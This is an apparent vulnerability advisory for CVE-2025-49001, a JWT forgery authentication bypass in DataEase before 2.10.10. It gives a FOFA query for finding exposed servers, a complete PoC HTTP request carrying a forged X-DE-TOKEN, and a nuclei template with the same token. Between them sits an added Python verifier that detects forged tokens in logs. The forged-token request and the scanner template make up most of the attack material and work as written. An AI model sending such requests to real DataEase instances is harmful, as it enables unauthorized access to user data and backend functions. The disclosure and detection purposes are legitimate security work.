Disclaimer
Do not use the techniques described in this article for unauthorized testing. Any direct or indirect consequences and losses arising from the dissemination or use of the information or tools provided here are the sole responsibility of the user; the author bears no responsibility for any adverse outcome. This article is for educational purposes only.
Vulnerability description:
DataEase is an open-source business intelligence and data visualization tool. In CVE-2025-49001, a flaw in its JWT algorithm implementation allows an attacker to forge a JWT using any secret, bypassing the permission checks, calling backend functional interfaces, and potentially achieving code execution.
Affected versions:
version < 2.10.10
FOFA:
body="/js/index-0.0.0-dataease.js" || body="/assets/css/style-0.0.0-dataease.css"
POC:
GET /de2api/user/info HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: application/json, text/plain, */*
Connection: close
Host: xx.x.xx.xx
out_auth_platform: default
X-DE-TOKEN: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1aWQiOjEsIm9pZCI6MX0.a5QYOfZDYlhAy-zUMYzKBBvCUs1ogZhjwKV5SBTECt8
Calling the /de2api/user/info endpoint with this token returns the user's information.
nuclei template:
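The check that the vulnerable versions effectively lack, as an added defensive example that is not from this writeup or from the DataEase code base: a strict HS256 verifier that accepts a token only when its signature was produced with the server's own configured secret (so the PoC token above is rejected), plus a scan over constructed access-log lines that flags requests whose X-DE-TOKEN fails that check. The server secret, the issuance helper and the log format are assumptions for the demo.

```python
import base64
import hashlib
import hmac
import json
import re
from typing import Optional

def _b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))

def _b64url_encode(b: bytes) -> str:
    return base64.urlsafe_b64encode(b).rstrip(b"=").decode()

def issue_hs256(claims: dict, secret: bytes) -> str:
    # Server-side issuance: sign "header.payload" with the configured secret.
    header = _b64url_encode(b'{"typ":"JWT","alg":"HS256"}')
    payload = _b64url_encode(json.dumps(claims, separators=(",", ":")).encode())
    sig = hmac.new(secret, f"{header}.{payload}".encode(), hashlib.sha256).digest()
    return f"{header}.{payload}.{_b64url_encode(sig)}"

def verify_hs256(token: str, secret: bytes) -> Optional[dict]:
    # Return the claims only if the signature was made with *this* secret;
    # a token signed under any other key is rejected.
    parts = token.split(".")
    if len(parts) != 3:
        return None
    h, p, s = parts
    try:
        if json.loads(_b64url_decode(h)).get("alg") != "HS256":
            return None  # never let the token choose the algorithm
        expected = hmac.new(secret, f"{h}.{p}".encode(), hashlib.sha256).digest()
        if not hmac.compare_digest(expected, _b64url_decode(s)):
            return None
        return json.loads(_b64url_decode(p))
    except (ValueError, AttributeError):
        return None

# Token from the PoC request above: header {"typ":"JWT","alg":"HS256"}, claims {"uid":1,"oid":1}.
POC_TOKEN = ("eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1aWQiOjEsIm9pZCI6MX0."
             "a5QYOfZDYlhAy-zUMYzKBBvCUs1ogZhjwKV5SBTECt8")
# Constructed secret standing in for the deployment's real configured value.
SERVER_SECRET = b"constructed-demo-secret"

def find_forged_tokens(log_lines: list, secret: bytes) -> list:
    # Constructed log format: "src=<ip> path=<path> X-DE-TOKEN=<jwt>".
    # Returns the source IPs whose token does not verify under the real secret.
    hits = []
    for line in log_lines:
        m = re.search(r"src=(\S+) .*X-DE-TOKEN=(\S+)", line)
        if m and verify_hs256(m.group(2), secret) is None:
            hits.append(m.group(1))
    return hits
```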
id: cve-2025-49001
info:
  name: Dataease JWT Authentication Bypass
  author: ProjectDiscoveryAI
  severity: medium
  description: |
    This template checks for the Dataease JWT Authentication Bypass vulnerability (CVE-2025-49001).
    Exploitation involves sending a crafted JWT token to bypass authentication.
  tags: jwt,auth-bypass,cve
http:
  - raw:
      - |
        GET /de2api/user/info HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
        Accept-Encoding: gzip, deflate
        Accept: application/json, text/plain, */*
        Connection: close
        out_auth_platform: default
        X-DE-TOKEN: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1aWQiOjEsIm9pZCI6MX0.a5QYOfZDYlhAy-zUMYzKBBvCUs1ogZhjwKV5SBTECt8
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "\"uid\":1"
          - "\"oid\":1"
        part: body